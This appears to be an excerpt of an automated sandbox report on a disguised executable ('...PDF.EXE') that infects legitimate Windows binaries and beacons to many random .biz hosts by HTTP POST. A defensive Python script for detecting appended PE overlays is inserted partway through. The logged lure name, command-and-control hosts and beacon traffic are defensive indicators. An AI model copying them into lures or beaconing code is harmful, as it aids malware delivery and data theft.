Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\7zFM.exe Joe Sandbox ML: detected
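The W32/Infector.Gen hits above land on dozens of executables that were already present on the analysis host (Adobe, 7-Zip, Java, AutoIt, Edge, and binaries under System32), so the infection modified legitimate files rather than only dropping new ones. The report does not describe how those files were altered, and the example below does not claim to. It is an added, generic triage check, not part of the report: for each PE it measures the data appended past the end of the last section (the overlay) that the Authenticode certificate table does not account for. An untouched binary, signed or not, scores 0; a file with extra bytes glued on scores the size of those bytes. The minimal PE images, the stand-in certificate blob and the "infector" bytes are all constructed in the code.

```python
"""Generic PE overlay triage: bytes after the last section not covered by the
certificate table.  Added example with constructed PE images; it does not describe
how the infector seen in this report modifies files."""
import struct

SEC_ALIGN, FILE_ALIGN, HDR_SIZE = 0x1000, 0x200, 0x200


def _align(n, a):
    return (n + a - 1) // a * a


def build_pe(section_data, overlay=b"", signed=False):
    """Constructed minimal PE32 with one section.  With signed=True the overlay is
    declared as the certificate table (data directory 4), as a real signed file does."""
    raw_size = _align(len(section_data), FILE_ALIGN)
    overlay_off = HDR_SIZE + raw_size
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)               # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)     # i386, 1 section
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 14, 0, raw_size, 0, 0, 0x1000, 0x1000, 0x2000, 0x400000,
                      SEC_ALIGN, FILE_ALIGN, 6, 0, 0, 0, 6, 0, 0,
                      SEC_ALIGN + _align(len(section_data), SEC_ALIGN), HDR_SIZE, 0, 2, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    if signed:
        dirs[4] = (overlay_off, len(overlay))   # IMAGE_DIRECTORY_ENTRY_SECURITY: file offset, size
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    sect = struct.pack("<8sIIIIIIHHI", b".text\x00\x00\x00", len(section_data), 0x1000,
                       raw_size, HDR_SIZE, 0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\x00\x00" + coff + opt + sect
    return headers.ljust(HDR_SIZE, b"\x00") + section_data.ljust(raw_size, b"\x00") + overlay


def _pe_layout(data):
    """Return (end_of_last_section, cert_offset, cert_size) read from the headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    dir_base = opt + (96 if magic == 0x10B else 112)          # PE32 vs PE32+
    cert_off, cert_size = struct.unpack_from("<II", data, dir_base + 4 * 8)
    sec_table = opt + opt_size
    end = 0
    for i in range(num_sections):                               # SizeOfRawData, PointerToRawData
        raw_size, raw_ptr = struct.unpack_from("<II", data, sec_table + i * 40 + 16)
        end = max(end, raw_ptr + raw_size)
    return end, cert_off, cert_size


def unexplained_overlay(data):
    """Bytes after the last section that the certificate table does not cover."""
    end, cert_off, cert_size = _pe_layout(data)
    overlay = max(len(data) - end, 0)
    if cert_size and cert_off == end and cert_size <= overlay:
        overlay -= cert_size
    return overlay


def triage(images):
    """Map each file name to its unexplained overlay size (or the parse error text)."""
    out = {}
    for name, blob in images.items():
        try:
            out[name] = unexplained_overlay(blob)
        except (ValueError, struct.error) as exc:
            out[name] = str(exc)
    return out


CODE = b"\x55\x8b\xec\x33\xc0\x5d\xc3"          # tiny constructed code stub
FAKE_CERT = b"\x30\x82" + b"\x00" * 0x2FE         # stand-in for a 0x300-byte WIN_CERTIFICATE
APPENDED = b"\xe9" + b"\x90" * 299                # 300 bytes a hypothetical infector glued on

SAMPLES = {
    "clean_unsigned.exe": build_pe(CODE),
    "clean_signed.exe": build_pe(CODE, FAKE_CERT, signed=True),
    "tampered_signed.exe": build_pe(CODE, FAKE_CERT, signed=True) + APPENDED,
    "tampered_unsigned.exe": build_pe(CODE, APPENDED),
    "not_a_pe.bin": b"PK\x03\x04" + b"\x00" * 60,
}

if __name__ == "__main__":
    for name, result in triage(SAMPLES).items():
        print(f"{name:24} {result}")
```

This catches appended payloads only. An infector that patches a section in place, or rewrites the file at the same size, leaves the overlay unchanged, so on a real host pair this with Authenticode verification of every flagged path and a hash comparison against a clean image of the same software versions.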
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: unknown Network traffic detected: DNS query count 101
Source: global traffic TCP traffic: 192.168.2.16:49716 -> 212.162.149.53:2049
Source: global traffic TCP traffic: 192.168.2.16:49720 -> 51.195.88.199:587
Source: global traffic DNS traffic detected: number of DNS queries: 101
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: global traffic TCP traffic: 192.168.2.16:49720 -> 51.195.88.199:587
Source: global traffic HTTP traffic detected: POST /ibmog HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 868
Source: global traffic HTTP traffic detected: POST /lutyxpgtxicgb HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gadlqtcclo HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ssbzmoy.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dafjrbte HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 868
Source: global traffic HTTP traffic detected: POST /qlyvjmdwxl HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ssbzmoy.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 868
Source: global traffic HTTP traffic detected: POST /rioeg HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: cvgrf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hshnlfiqt HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: npukfztj.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /avqaqcipoasdlbgl HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: npukfztj.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ocfuav HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hea HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qvtcyxjgqcewj HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: knjghuig.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qjnvredjkanikntw HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: lpuegx.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /wqlih HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: lpuegx.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kwejxnusmbg HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vjaxhpbji.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lsedv HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vjaxhpbji.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hdnypmld HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: xlfhhhm.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cygphrvvuwwhpqjy HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ifsaia.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pjojuiupwn HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: saytjshyf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /iac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ful HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /l HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /iou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kyvgodg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jtccktxedeenfqg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /soubumgu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pgm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /aawflokdkaaso HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hysug HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /sem HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vsftv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ieibbbqqgmrvhkh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gjwgeffxixqbuh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /yccyodm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xurinfdw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /orioms HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /sucofgimje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /bpkaqfdvy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /afqnwtrkmt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kybt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vahgcdxtf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jjv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jxjcyhijmgghr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rqdnnkaqeymsqe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /adwycgrxdylfxl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lqycgpuam HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
